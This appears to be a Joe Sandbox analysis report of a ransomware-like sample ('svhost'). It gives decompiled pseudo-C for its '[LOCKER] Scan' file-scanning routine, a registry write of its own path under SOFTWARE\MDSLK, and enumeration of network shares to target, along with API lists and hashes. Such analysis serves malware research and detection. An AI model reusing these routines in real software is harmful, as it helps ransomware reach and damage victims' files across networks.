                                      				signed int _v57;
                                      				signed int _v64;
                                      				char _v65;
                                      				char _v66;
                                      				signed int _v72;
                                      				intOrPtr _v76;
                                      				intOrPtr _v80;
                                      				signed int _v84;
                                      				char _v88;
                                      				char _v92;
                                      				char _v96;
                                      				char _v100;
                                      				char _v104;
                                      				char _v108;
                                      				char _v112;
                                      				char _v120;
                                      				char _v128;
                                      				char _v140;
                                      				signed int _t67;
                                      				signed int _t68;
                                      				void* _t76;
                                      				void* _t93;
                                      				void* _t94;
                                      				signed char _t104;
                                      				signed int _t106;
                                      				void* _t108;
                                      				intOrPtr* _t117;
                                      				void* _t118;
                                      				void* _t168;
                                      				void* _t169;
                                      				signed int _t170;
                                      				void* _t171;
                                      				void* _t172;
                                      				void* _t173;
                                      				void* _t174;
                                      				void* _t183;
                                      
                                      				_t183 = __fp0;
                                      				_t169 = __esi;
                                      				_t168 = __edi;
                                      				_t118 = __ebx;
                                      				_push(0xffffffff);
                                      				_push(0xec0460);
                                      				_push( *[fs:0x0]);
                                      				_t172 = _t171 - 0x7c;
                                      				_t67 =  *0xeef074; // 0x221cac15
                                      				_t68 = _t67 ^ _t170;
                                      				_v20 = _t68;
                                      				_push(_t68);
                                      				 *[fs:0x0] =  &_v16;
                                      				if((E00E579A0(_a4) & 0x000000ff) == 0) {
                                      					_v57 = 0;
                                      					E00E515C0( &_v24, 4);
                                      					E00E5A730( &_v24, _a16);
                                      					_t173 = _t172 + 8;
                                      					while(1) {
                                      						_t76 = E00E5A750( &_v104, _a16);
                                      						_t174 = _t173 + 8;
                                      						if((E00E56500( &_v24, _t76) & 0x000000ff) == 0) {
                                      							break;
                                      						}
                                      						_push(0);
                                      						_t108 = E00E51950( &_v128, 1);
                                      						_t173 = _t174 + 0xc;
                                      						if(E00E5A770(_t118, E00E56560( &_v24) + 0x18, _t168, _t169, _t183, _t108) != 0) {
                                      							L8:
                                      							E00E56540( &_v24);
                                      							continue;
                                      						} else {
                                      							_v76 = _v24;
                                      							E00E565F0(_a16,  &_v108, _v76);
                                      							if((E00E565B0(_a16) & 0x000000ff) == 0) {
                                      								_t117 = E00E5A730( &_v112, _a16);
                                      								_t173 = _t173 + 8;
                                      								_v24 =  *_t117;
                                      								goto L8;
                                      							}
                                      						}
                                      						break;
                                      					}
                                      					_t159 = _a16;
                                      					_v72 = _a16;
                                      					_v64 = E00E51BE0(_v72);
                                      					_v80 = E00E51BF0(_v72);
                                      					while(1) {
                                      						__eflags = _v64 - _v80;
                                      						if(_v64 == _v80) {
                                      							break;
                                      						}
                                      						_v84 = _v64;
                                      						_t104 = E00E5A7B0(_v84, _a4);
                                      						_t174 = _t174 + 8;
                                      						_t159 = _t104 & 0x000000ff;
                                      						__eflags = _t104 & 0x000000ff;
                                      						if((_t104 & 0x000000ff) == 0) {
                                      							_t106 = _v64 + 0x20;
                                      							__eflags = _t106;
                                      							_v64 = _t106;
                                      							continue;
                                      						} else {
                                      							_v57 = 1;
                                      						}
                                      						break;
                                      					}
                                      					__eflags = _v57 & 0x000000ff;
                                      					if((_v57 & 0x000000ff) != 0) {
                                      						E00E517B0(E00E517B0(E00E517B0(E00E51100( &_v66), L"[LOCKER] Already Scan "), _a4), "\n");
                                      					} else {
                                      						E00E517B0(E00E517B0(E00E517B0(E00E51100( &_v65), L"[LOCKER] Scan "), _a4), "\n");
                                      						E00E55C20( &_v56);
                                      						E00E57B00( &_v56, _a4);
                                      						_v88 = _a8;
                                      						_v92 =  &M00E65690;
                                      						_v96 = _a12;
                                      						_v100 =  &M00E69520;
                                      						_t93 = E00E5A7D0(__eflags,  &_v140,  &_v92,  &_v88, 0xed24eb, 0xed24ea);
                                      						_t94 = E00E51650(_a4);
                                      						_t159 =  &_v120;
                                      						E00E550F0(E00E5A820(_t118, _t168, _t169,  &_v120, 1,  &_v100,  &_v96, _t94, _t93));
                                      						E00E55160( &_v120);
                                      						E00E55B40(_a16, E00E51650( &_v56));
                                      						E00E55C50( &_v56);
                                      					}
                                      				}
                                      				 *[fs:0x0] = _v16;
                                      				__eflags = _v20 ^ _t170;
                                      				return E00E89A35(_t118, _v20 ^ _t170, _t159, _t168, _t169);
                                      			}

                                      APIs
                                      • std::ios_base::good.LIBCPMTD ref: 00E5590B
                                      • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00E55957
                                      • std::_Mutex_base::~_Mutex_base.LIBCONCRTD ref: 00E55977
                                        • Part of subcall function 00E5A770: std::make_error_code.LIBCPMTD ref: 00E5A78E
                                      • shared_ptr.LIBCPMTD ref: 00E55ACF
                                      • ~.LIBCPMTD ref: 00E55AF4
                                        • Part of subcall function 00E51950: DName::DName.LIBCMTD ref: 00E5195A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Affinity::operator!=Concurrency::details::HardwareMutex_baseMutex_base::~_NameName::shared_ptrstd::_std::ios_base::goodstd::make_error_code
                                      • String ID: [LOCKER] Already Scan $[LOCKER] Scan
                                      • API String ID: 1668837174-3324642398
                                      • Opcode ID: 43a4657ec93ede8d314ff0129b459fb4480a723a97a5fbaad7fcdda4f377e788
                                      • Instruction ID: 4fc44e3703f121ba29b1b71d1cc27c2f5f8b4f3c95059011ef985c747983a6e0
                                      • Opcode Fuzzy Hash: 43a4657ec93ede8d314ff0129b459fb4480a723a97a5fbaad7fcdda4f377e788
                                      • Instruction Fuzzy Hash: A1718772D002089BCB04EFA4D962EEE77B5AF54302F545929FD0677281FF34A909CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 86%
                                      			E00E62040(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, char _a8) {
                                      				char _v16;
                                      				signed int _v20;
                                      				char _v21;
                                      				char _v48;
                                      				signed int _v52;
                                      				char _v53;
                                      				char _v54;
                                      				intOrPtr _v60;
                                      				signed int _v64;
                                      				signed int _t40;
                                      				signed int _t41;
                                      				signed char _t47;
                                      				void* _t55;
                                      				signed int _t96;
                                      
                                      				_t95 = __esi;
                                      				_t94 = __edi;
                                      				_t64 = __ebx;
                                      				_push(0xffffffff);
                                      				_push(0xec0df0);
                                      				_push( *[fs:0x0]);
                                      				_t40 =  *0xeef074; // 0x221cac15
                                      				_t41 = _t40 ^ _t96;
                                      				_v20 = _t41;
                                      				_push(_t41);
                                      				_t2 =  &_v16; // 0xe55e75
                                      				 *[fs:0x0] = _t2;
                                      				_v60 = __ecx;
                                      				_v54 = 0;
                                      				if((E00E579A0(_v60 + 0x7c) & 0x000000ff) != 0) {
                                      					L12:
                                      					__eflags = 0;
                                      				} else {
                                      					_t47 = E00E579A0(_a4);
                                      					_t89 = _t47 & 0x000000ff;
                                      					if((_t47 & 0x000000ff) != 0) {
                                      						goto L12;
                                      					} else {
                                      						_t7 =  &_a8; // 0xe55e75
                                      						if((E00E579A0( *_t7) & 0x000000ff) != 0) {
                                      							goto L12;
                                      						} else {
                                      							_v64 = E00E63280(_v60 + 0x7c, _a4, 0);
                                      							if(_v64 == 0xffffffff) {
                                      								goto L12;
                                      							} else {
                                      								_t12 =  &_a8; // 0xe55e75
                                      								E00E62190(__ebx,  &_v21, __edi, __esi,  &_v48, E00E51650( *_t12));
                                      								_v52 = 0;
                                      								while(_v52 < E00E57A20( &_v48)) {
                                      									if(_v52 > 0 && _v52 % 0x80 == 0) {
                                      										asm("lfence");
                                      										E00E63530(_t64,  &_v48, _t94, _t95, _v52, "<br>", 4);
                                      										_v52 = _v52 + 1;
                                      									}
                                      									_v52 = _v52 + 1;
                                      								}
                                      								_t55 = E00E57A20(_a4);
                                      								_t89 = _v64;
                                      								E00E634F0(_t64, _v60 + 0x7c, _t94, _t95, __eflags, _v64, _t55,  &_v48);
                                      								_v53 = 1;
                                      								E00E57F50( &_v48);
                                      							}
                                      						}
                                      					}
                                      				}
                                      				_t37 =  &_v16; // 0xe55e75
                                      				 *[fs:0x0] =  *_t37;
                                      				__eflags = _v20 ^ _t96;
                                      				return E00E89A35(_t64, _v20 ^ _t96, _t89, _t94, _t95);
                                      			}

                                      APIs
                                      • std::ios_base::good.LIBCPMTD ref: 00E62076
                                      • std::ios_base::good.LIBCPMTD ref: 00E62089
                                      • std::ios_base::good.LIBCPMTD ref: 00E6209C
                                        • Part of subcall function 00E62190: task.LIBCPMTD ref: 00E62256
                                      • task.LIBCPMTD ref: 00E6215C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::ios_base::good$task
                                      • String ID: <br>$u^$u^
                                      • API String ID: 1082396423-3425503538
                                      • Opcode ID: a17f251f72fefa6294009a55d1e5df84ec27caaa13eef4dc4c17419c276dd081
                                      • Instruction ID: 0bcdeefbb7bd93f59452be8dfd73cd983698056d8e1eeee66187e43d3b5399d8
                                      • Opcode Fuzzy Hash: a17f251f72fefa6294009a55d1e5df84ec27caaa13eef4dc4c17419c276dd081
                                      • Instruction Fuzzy Hash: 5B315F71D54148ABCB08DFA8F891BEEB7B5BF94344F00912DFA567B282EB305909CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: NameName::
                                      • String ID: :
                                      • API String ID: 1333004437-2144431980
                                      • Opcode ID: bbcc402540c8cbd11a47e37db72dd58c8c978e0457d2929bf92a909f02b1ecf8
                                      • Instruction ID: adc8d8454d30553aeb8afd14238d261f2f02bd1a1326856fa3521c65d5d07c12
                                      • Opcode Fuzzy Hash: bbcc402540c8cbd11a47e37db72dd58c8c978e0457d2929bf92a909f02b1ecf8
                                      • Instruction Fuzzy Hash: 5241BBB4D01209DFCB04DF94D991AEEBBF5AF88341F24956AE816BB351DB306A05CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00E55680(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                      				signed int _v8;
                                      				char _v9;
                                      				char _v36;
                                      				void* _v40;
                                      				char _v41;
                                      				long _v48;
                                      				int _v52;
                                      				signed int _t16;
                                      				signed char _t20;
                                      				signed int _t25;
                                      				signed int _t43;
                                      
                                      				_t42 = __esi;
                                      				_t41 = __edi;
                                      				_t30 = __ebx;
                                      				_t16 =  *0xeef074; // 0x221cac15
                                      				_v8 = _t16 ^ _t43;
                                      				_v41 = 0;
                                      				E00E55720(__ebx,  &_v9, __edi, __esi, __eflags,  &_v36);
                                      				_t20 = E00E579A0( &_v36);
                                      				_t40 = _t20 & 0x000000ff;
                                      				if((_t20 & 0x000000ff) == 0) {
                                      					_v48 = RegCreateKeyW(0x80000001, L"SOFTWARE\\MDSLK",  &_v40);
                                      					if(_v48 == 0) {
                                      						_v52 = 1;
                                      						_t25 = E00E57A20( &_v36);
                                      						RegSetValueExW(_v40, L"Self", 0, 1, E00E57A40(), _t25 << 1);
                                      						_t40 = _v40;
                                      						RegCloseKey(_v40);
                                      					}
                                      				}
                                      				E00E57B40( &_v36);
                                      				return E00E89A35(_t30, _v8 ^ _t43, _t40, _t41, _t42);
                                      			}

                                      APIs
                                        • Part of subcall function 00E55720: GetModuleFileNameW.KERNEL32(00000000,00000000,00000000,00000000,00000104,00000000,221CAC15), ref: 00E55770
                                        • Part of subcall function 00E55720: task.LIBCPMTD ref: 00E557C9
                                        • Part of subcall function 00E55720: task.LIBCPMTD ref: 00E557FA
                                      • std::ios_base::good.LIBCPMTD ref: 00E556A4
                                      • RegCreateKeyW.ADVAPI32(80000001,SOFTWARE\MDSLK,?), ref: 00E556BE
                                      • RegSetValueExW.ADVAPI32(?,Self,00000000,00000001,00000000,00000000), ref: 00E556F5
                                      • RegCloseKey.ADVAPI32(?), ref: 00E556FF
                                      • task.LIBCPMTD ref: 00E55708
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: task$CloseCreateFileModuleNameValuestd::ios_base::good
                                      • String ID: SOFTWARE\MDSLK$Self
                                      • API String ID: 3810202371-3971736956
                                      • Opcode ID: 5251efb55a6a165c05adb35cde7a3ec32fb812f949e7dda5c3b3ad3979d8837c
                                      • Instruction ID: a13e0a7ce9488fefd8aa79b634a98862557ff057be6ada6f06e258f42e18b558
                                      • Opcode Fuzzy Hash: 5251efb55a6a165c05adb35cde7a3ec32fb812f949e7dda5c3b3ad3979d8837c
                                      • Instruction Fuzzy Hash: 22118E7191020CDFCB04EFA4DC52FEEB3B5EB58301F405469E94276191EF716A09CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 85%
                                      			E00E6DD10(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                      				char _v16;
                                      				signed int _v20;
                                      				char _v24;
                                      				char _v28;
                                      				char _v32;
                                      				char _v44;
                                      				char _v68;
                                      				void* _v72;
                                      				intOrPtr _v76;
                                      				intOrPtr _v80;
                                      				intOrPtr* _v84;
                                      				intOrPtr _v88;
                                      				char _v112;
                                      				char _v136;
                                      				char _v160;
                                      				char _v184;
                                      				signed int _t53;
                                      				signed int _t54;
                                      				intOrPtr _t67;
                                      				void* _t71;
                                      				void* _t76;
                                      				void* _t80;
                                      				void* _t86;
                                      				void* _t118;
                                      				void* _t119;
                                      				signed int _t120;
                                      				void* _t121;
                                      				void* _t122;
                                      
                                      				_t119 = __esi;
                                      				_t118 = __edi;
                                      				_t86 = __ebx;
                                      				_push(0xffffffff);
                                      				_push(0xec1830);
                                      				_push( *[fs:0x0]);
                                      				_t122 = _t121 - 0xa8;
                                      				_t53 =  *0xeef074; // 0x221cac15
                                      				_t54 = _t53 ^ _t120;
                                      				_v20 = _t54;
                                      				_push(_t54);
                                      				 *[fs:0x0] =  &_v16;
                                      				_v88 = __ecx;
                                      				E00E515C0( &_v44, 0xc);
                                      				E00E566A0( &_v44);
                                      				if((E00E579A0(_a8) & 0x000000ff) == 0) {
                                      					_v72 = 0;
                                      					_v76 = 0;
                                      					_v24 = 0;
                                      					_v32 = 0;
                                      					_v28 = 0;
                                      					do {
                                      						_t113 =  &_v32;
                                      						_t67 = E00E57A40();
                                      						__imp__NetShareEnum(_t67, 1,  &_v72, 0xffffffff,  &_v24,  &_v32,  &_v28);
                                      						_v76 = _t67;
                                      						if(_v76 == 0 || _v76 == 0xea) {
                                      							_v84 = _v72;
                                      							_v80 = 1;
                                      							while(1) {
                                      								_t130 = _v80 - _v24;
                                      								if(_v80 > _v24) {
                                      									break;
                                      								}
                                      								E00E57CD0(_t86,  &_v68, _t118, _t119, _t130,  *_v84);
                                      								_t71 = E00E6DF00( &_v68, "$", 0);
                                      								_t131 = _t71 - 0xffffffff;
                                      								if(_t71 == 0xffffffff) {
                                      									_t76 = E00E66510(_t86, _t118, _t131,  &_v184, L"\\\\", _a8);
                                      									_t107 =  &_v160;
                                      									_t80 = E00E68360(_t86, _t107, _t118, _t119, _t131,  &_v112, E00E6E080(_t86,  &_v160, _t118, _t119, _t131,  &_v136, E00E68360(_t86,  &_v160, _t118, _t119, _t131,  &_v160, _t76, "\\"),  &_v68), "\\");
                                      									_t122 = _t122 + 0x30;
                                      									E00E61E50( &_v44, _t80);
                                      									E00E57B40( &_v112);
                                      									E00E57B40( &_v136);
                                      									E00E57B40( &_v160);
                                      									E00E57B40( &_v184);
                                      								}
                                      								_v84 = _v84 + 0xc;
                                      								E00E57B40( &_v68);
                                      								_v80 = _v80 + 1;
                                      							}
                                      							_t113 = _v72;
                                      							NetApiBufferFree(_v72);
                                      						}
                                      						__eflags = _v76 - 0xea;
                                      					} while (_v76 == 0xea);
                                      				}
                                      				E00E57460(_a4, E00E51650( &_v44));
                                      				E00E578B0( &_v44);
                                      				 *[fs:0x0] = _v16;
                                      				__eflags = _v20 ^ _t120;
                                      				return E00E89A35(_t86, _v20 ^ _t120, _t113, _t118, _t119);
			}

                                      APIs
                                      • std::ios_base::good.LIBCPMTD ref: 00E6DD53
                                      • NetShareEnum.NETAPI32(00000000,00000001,00000000,000000FF,00000000,00000000,00000000,0000000C,221CAC15), ref: 00E6DDA3
                                      • task.LIBCPMTD ref: 00E6DE68
                                      • task.LIBCPMTD ref: 00E6DE73
                                      • task.LIBCPMTD ref: 00E6DE7E
                                      • task.LIBCPMTD ref: 00E6DE89
                                      • task.LIBCPMTD ref: 00E6DE9A
                                      • NetApiBufferFree.NETAPI32(00000000), ref: 00E6DEA8
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: task$BufferEnumFreeSharestd::ios_base::good
                                      • String ID:
                                      • API String ID: 1990917881-0
                                      • Opcode ID: c72796c686b7aec00ad91bdef508dd6f5a3562420c9832380aa21de568e91df9
                                      • Instruction ID: 8c67af6674e3faf6d3e85b05f1748db223fc4fbee44137172374db6edf09377c
                                      • Opcode Fuzzy Hash: c72796c686b7aec00ad91bdef508dd6f5a3562420c9832380aa21de568e91df9
                                      • Instruction Fuzzy Hash: EF519FB1D04208DBCB04EF90EC92FEEB7B9BF54304F505669E406BB281EB706A49CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 75%
                                      			E00EAEE0B(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                                      				signed int _v8;
                                      				signed int _v12;
                                      				short _v270;
                                      				short _v272;
                                      				char _v528;
                                      				char _v700;
                                      				signed int _v704;
                                      				short _v706;
                                      				signed int* _v708;
                                      				signed int _v712;
                                      				signed int _v716;
                                      				signed int _v720;
                                      				signed int* _v724;
                                      				intOrPtr _v728;
                                      				signed int _v732;
                                      				signed int _v736;
                                      				signed int _v740;
                                      				signed int _v744;
                                      				intOrPtr _v772;
                                      				signed int _v784;
                                      				void* __ebp;
                                      				signed int _t151;
                                      				void* _t158;
                                      				signed int _t161;
                                      				signed int _t162;
                                      				intOrPtr _t163;
                                      				signed int _t166;
                                      				signed int _t168;
                                      				signed int _t169;
                                      				signed int _t172;
                                      				signed int _t173;
                                      				signed int _t176;
                                      				signed int _t177;
                                      				signed int _t179;
                                      				signed int _t199;
                                      				signed int _t201;
                                      				signed int _t203;
                                      				signed int _t208;
                                      				signed int _t211;
                                      				void* _t212;
                                      				signed int _t219;
                                      				intOrPtr* _t220;
                                      				char* _t227;
                                      				signed int _t229;
                                      				intOrPtr _t232;
                                      				intOrPtr* _t233;
                                      				signed int _t235;
                                      				signed int* _t239;
                                      				signed int _t240;
                                      				intOrPtr _t247;
                                      				void* _t248;
                                      				void* _t251;
                                      				signed int _t253;
                                      				signed int _t255;
                                      				signed int _t258;
                                      				signed int* _t259;
                                      				intOrPtr* _t260;
                                      				short _t261;
                                      				signed int _t263;
                                      				signed int _t267;
                                      				void* _t269;
                                      				void* _t271;
                                      
                                      				_t245 = __edx;
                                      				_t263 = _t267;
                                      				_t151 =  *0xeef074; // 0x221cac15
                                      				_v8 = _t151 ^ _t263;
                                      				_push(__ebx);
                                      				_t211 = _a8;
                                      				_push(__esi);
                                      				_push(__edi);
                                      				_t247 = _a4;
                                      				_v736 = _t211;
                                      				_v724 = E00EB0EFC(__ecx, __edx) + 0x278;
                                      				_t158 = E00EAE4F6(_t211, __edx, _t247, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v712);
                                      				_t269 = _t267 - 0x2e4 + 0x18;
                                      				if(_t158 == 0) {
                                      					L40:
                                      					__eflags = 0;
                                      					goto L41;
                                      				} else {
                                      					_t10 = _t211 + 2; // 0x6
                                      					_t253 = _t10 << 4;
                                      					_t161 =  &_v272;
                                      					_v716 = _t253;
                                      					_t245 =  *(_t253 + _t247);
                                      					_t219 =  *(_t253 + _t247);
                                      					while(1) {
                                      						_v704 = _v704 & 0x00000000;
                                      						_t255 = _v716;
                                      						if( *_t161 !=  *_t219) {
                                      							break;
                                      						}
                                      						if( *_t161 == 0) {
                                      							L7:
                                      							_t162 = _v704;
                                      						} else {
                                      							_t261 =  *((intOrPtr*)(_t161 + 2));
                                      							_v706 = _t261;
                                      							_t255 = _v716;
                                      							if(_t261 !=  *((intOrPtr*)(_t219 + 2))) {
                                      								break;
                                      							} else {
                                      								_t161 = _t161 + 4;
                                      								_t219 = _t219 + 4;
                                      								if(_v706 != 0) {
                                      									continue;
                                      								} else {
                                      									goto L7;
                                      								}
                                      							}
                                      						}
                                      						L9:
                                      						if(_t162 != 0) {
                                      							_t220 =  &_v272;
                                      							_t245 = _t220 + 2;
                                      							do {
                                      								_t163 =  *_t220;
                                      								_t220 = _t220 + 2;
                                      								__eflags = _t163 - _v704;
                                      							} while (_t163 != _v704);
                                      							_v720 = (_t220 - _t245 >> 1) + 1;
                                      							_t166 = E00EB0559(4 + ((_t220 - _t245 >> 1) + 1) * 2);
                                      							_v732 = _t166;
                                      							__eflags = _t166;
                                      							if(_t166 == 0) {
                                      								goto L40;
                                      							} else {
                                      								_v728 =  *((intOrPtr*)(_t255 + _t247));
                                      								_v740 =  *(_t247 + 0xa0 + _t211 * 4);
                                      								_v744 =  *(_t247 + 8);
                                      								_t227 =  &_v272;
                                      								_v708 = _t166 + 4;
                                      								_t168 = E00EA58BC(_t166 + 4, _v720, _t227);
                                      								_t271 = _t269 + 0xc;
                                      								__eflags = _t168;
                                      								if(_t168 != 0) {
                                      									_t169 = _v704;
                                      									_push(_t169);
                                      									_push(_t169);
                                      									_push(_t169);
                                      									_push(_t169);
                                      									_push(_t169);
                                      									E00EA4980();
                                      									asm("int3");
                                      									_push(_t263);
                                      									_push(_t227);
                                      									_v784 = _v784 & 0x00000000;
                                      									_t172 = E00EB16D5(_v772, 0x20001004,  &_v784, 2);
                                      									__eflags = _t172;
                                      									if(_t172 == 0) {
                                      										L50:
                                      										_t173 = 0xfde9;
                                      									} else {
                                      										_t173 = _v12;
                                      										__eflags = _t173;
                                      										if(_t173 == 0) {
                                      											goto L50;
                                      										}
                                      									}
                                      									return _t173;
                                      								} else {
                                      									__eflags = _v272 - 0x43;
                                      									 *((intOrPtr*)(_t255 + _t247)) = _v708;
                                      									if(_v272 != 0x43) {
                                      										L18:
                                      										_t176 = E00EAE213(_t211, _t247,  &_v700);
                                      										_t229 = _v704;
                                      									} else {
                                      										__eflags = _v270;
                                      										if(_v270 != 0) {
                                      											goto L18;
                                      										} else {
                                      											_t229 = _v704;
                                      											_t176 = _t229;
                                      										}
                                      									}
                                      									 *(_t247 + 0xa0 + _t211 * 4) = _t176;
                                      									__eflags = _t211 - 2;
                                      									if(_t211 != 2) {
                                      										__eflags = _t211 - 1;
                                      										if(_t211 != 1) {
                                      											__eflags = _t211 - 5;
                                      											if(_t211 == 5) {
                                      												 *((intOrPtr*)(_t247 + 0x14)) = _v712;
                                      											}
                                      										} else {
                                      											 *((intOrPtr*)(_t247 + 0x10)) = _v712;
                                      										}
                                      									} else {
                                      										_t259 = _v724;
                                      										_t245 = _t229;
                                      										_t239 = _t259;
                                      										 *(_t247 + 8) = _v712;
                                      										_v708 = _t259;
                                      										_v720 = _t259[8];
                                      										_v712 = _t259[9];
                                      										while(1) {
                                      											__eflags =  *(_t247 + 8) -  *_t239;
                                      											if( *(_t247 + 8) ==  *_t239) {
                                      												break;
                                      											}
                                      											_t260 = _v708;
                                      											_t245 = _t245 + 1;
                                      											_t208 =  *_t239;
                                      											 *_t260 = _v720;
                                      											_v712 = _t239[1];
                                      											_t239 = _t260 + 8;
                                      											 *((intOrPtr*)(_t260 + 4)) = _v712;
                                      											_t211 = _v736;
                                      											_t259 = _v724;
                                      											_v720 = _t208;
                                      											_v708 = _t239;
                                      											__eflags = _t245 - 5;
                                      											if(_t245 < 5) {
                                      												continue;
                                      											} else {
                                      											}
                                      											L26:
                                      											__eflags = _t245 - 5;
                                      											if(__eflags == 0) {
                                      												_t199 = E00EB5E4E(_t245, __eflags, _v704, 1, 0xecaf30, 0x7f,  &_v528,  *(_t247 + 8), 1);
                                      												_t271 = _t271 + 0x1c;
                                      												__eflags = _t199;
                                      												if(_t199 == 0) {
                                      													_t240 = _v704;
                                      												} else {
                                      													_t201 = _v704;
                                      													do {
                                      														 *(_t263 + _t201 * 2 - 0x20c) =  *(_t263 + _t201 * 2 - 0x20c) & 0x000001ff;
                                      														_t201 = _t201 + 1;
                                      														__eflags = _t201 - 0x7f;
                                      													} while (_t201 < 0x7f);
                                      													_t203 = E00EA19FD( &_v528,  *0xeef2b8, 0xfe);
                                      													_t271 = _t271 + 0xc;
                                      													__eflags = _t203;
                                      													_t240 = 0 | _t203 == 0x00000000;
                                      												}
                                      												_t259[1] = _t240;
                                      												 *_t259 =  *(_t247 + 8);
                                      											}
                                      											 *(_t247 + 0x18) = _t259[1];
                                      											goto L38;
                                      										}
                                      										__eflags = _t245;
                                      										if(_t245 != 0) {
                                      											 *_t259 =  *(_t259 + _t245 * 8);
                                      											_t259[1] =  *(_t259 + 4 + _t245 * 8);
                                      											 *(_t259 + _t245 * 8) = _v720;
                                      											 *(_t259 + 4 + _t245 * 8) = _v712;
                                      										}
                                      										goto L26;
                                      									}
                                      									L38:
                                      									_t177 = _t211 * 0xc;
                                      									_t106 = _t177 + 0xecafb8; // 0xe8a7d8
                                      									 *0xec4320(_t247);
                                      									_t179 =  *((intOrPtr*)( *_t106))();
                                      									_t232 = _v728;
                                      									__eflags = _t179;
                                      									if(_t179 == 0) {
                                      										__eflags = _t232 - 0xeef388;
                                      										if(_t232 != 0xeef388) {
                                      											_t258 = _t211 + _t211;
                                      											__eflags = _t258;
                                      											asm("lock xadd [eax], ecx");
                                      											if(_t258 != 0) {
                                      												goto L45;
                                      											} else {
                                      												E00EB051F( *((intOrPtr*)(_t247 + 0x28 + _t258 * 8)));
                                      												E00EB051F( *((intOrPtr*)(_t247 + 0x24 + _t258 * 8)));
                                      												E00EB051F( *(_t247 + 0xa0 + _t211 * 4));
                                      												_t235 = _v704;
                                      												 *(_v716 + _t247) = _t235;
                                      												 *(_t247 + 0xa0 + _t211 * 4) = _t235;
                                      											}
                                      										}
                                      										_t233 = _v732;
                                      										 *_t233 = 1;
                                      										 *((intOrPtr*)(_t247 + 0x28 + (_t211 + _t211) * 8)) = _t233;
                                      									} else {
                                      										 *((intOrPtr*)(_v716 + _t247)) = _t232;
                                      										E00EB051F( *(_t247 + 0xa0 + _t211 * 4));
                                      										 *(_t247 + 0xa0 + _t211 * 4) = _v740;
                                      										E00EB051F(_v732);
                                      										 *(_t247 + 8) = _v744;
                                      										goto L40;
                                      									}
                                      									goto L41;
                                      								}
                                      							}
                                      						} else {
                                      							L41:
                                      							_pop(_t248);
                                      							_pop(_t251);
                                      							_pop(_t212);
                                      							return E00E89A35(_t212, _v8 ^ _t263, _t245, _t248, _t251);
                                      						}
                                      						goto L52;
                                      					}
                                      					asm("sbb eax, eax");
                                      					_t162 = _t161 | 0x00000001;
                                      					__eflags = _t162;
                                      					goto L9;
                                      				}
                                      				L52:
			}
                                      0x00eaf1f3
                                      0x00eaf1f6
                                      0x00eaf1f8
                                      0x00000000
                                      0x00000000
                                      0x00eaf1f8
                                      0x00eaf200
                                      0x00eaef67
                                      0x00eaef67
                                      0x00eaef75
                                      0x00eaef78
                                      0x00eaef8e
                                      0x00eaef95
                                      0x00eaef9b
                                      0x00eaef7a
                                      0x00eaef7a
